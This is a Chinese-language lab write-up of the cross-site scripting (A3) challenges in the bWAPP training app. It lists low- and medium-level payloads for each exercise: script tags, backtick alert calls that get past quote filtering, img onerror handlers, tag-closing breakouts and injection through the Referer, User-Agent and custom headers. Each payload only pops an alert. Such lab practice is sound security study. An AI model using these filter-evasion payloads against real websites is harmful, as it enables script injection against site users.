bWAPP A3 XSS解题记录
GET
将payload输入到First name中 ,Last name中随便输入点什么
payload:<script>alert('ok')</script>
POST
low payload:<script>alert('ok')</script>
medium payload:<script>alert`ok`</script>
JSON
low payload:"}]}';alert('ok');</script>
medium模式不会,符号被转换成了HTML实体
AJAX/JSON
low and medium payload:
<img src=1 onerror=alert('ok')>
AJAX/XML
low payload:<img src=1 onerror=alert('ok')>
medium payload:<img src=1 onerror=alert`ok`>
Back Button
开发者模式查看按钮
发现可以将input标签进行闭合来实现注入,用burpsuite进行抓包,修改referer
low payload:'"><script>alert('ok')</script>
medium payload:'"><script>alert`ok`</script>
Custom Header
百度翻译了一下页面的提示,意思是 “一些web客户端使用自定义的HTTP请求头。。。我们的bWAPP头的内容:”
所以我们抓包自己写一个请求头
low payload:bWAPP: <script>alert('ok')</script>
medium对单引号进行了过滤,所以换成以下payload
medium payload:bWAPP: <script>alert`ok`</script>
Eval
low 修改URL中的Data()为alert('ok')
medium 修改URL中的Data()如下图
HREF
随便输入个123后,查看源码,发现我们输入的132在p标签内,所以尝试闭合p标签
low payload:</p><script>alert('ok')</script>
medium 符号被转换成了HTML实体,所以不会
Login Form
这题貌似没有XSS 注入点(我没找到)但是可以用SQL注入,所以就不写了
phpMyAdmin BBCode Tag XSS
没思路。。。。。
PHP_SELF
First name输入payload Last name随便输入点什么
low payload:<script>alert('ok')</script>
medium payload:<script>alert`ok`</script>
Referer
看页面上的提示,发现referer的内容会显示在页面上,所以我们抓包修改referer 修改结果如图所示
low payload:<script>alert('ok')</script>
medium payload:<script>alert`ok`</script>
User-Agent(反射型)
看页面上的提示,发现User-Agent的内容会显示在页面上,所以我们抓包修改User-Agent 修改结果如图所示
low payload:<script>alert('ok')</script>
medium payload:<script>alert`ok`</script>
Blog
随便输入个一二三,查看网页源码发现我们输入的内容在td标签内,所以我们尝试闭合td标签
low payload:<script>alert('ok')<script>
medium payload:<script>alert`ok`</script>
Change Secret
开发者模式下发现有一个type为hidden的input
将hidden修改为text,在新出现的文本框中输入payload
low payload:"><script>alert`ok`</script><"
medium不会
Cookies SQLiteManager XSS
貌似不止用到了XSS注入,好像还有点别的东西,其实我不会
Stored (User-Agent)
抓包修改User-Agent
low payload:<script>alert('ok')</script>
medium payload:<script>alert`ok`</script>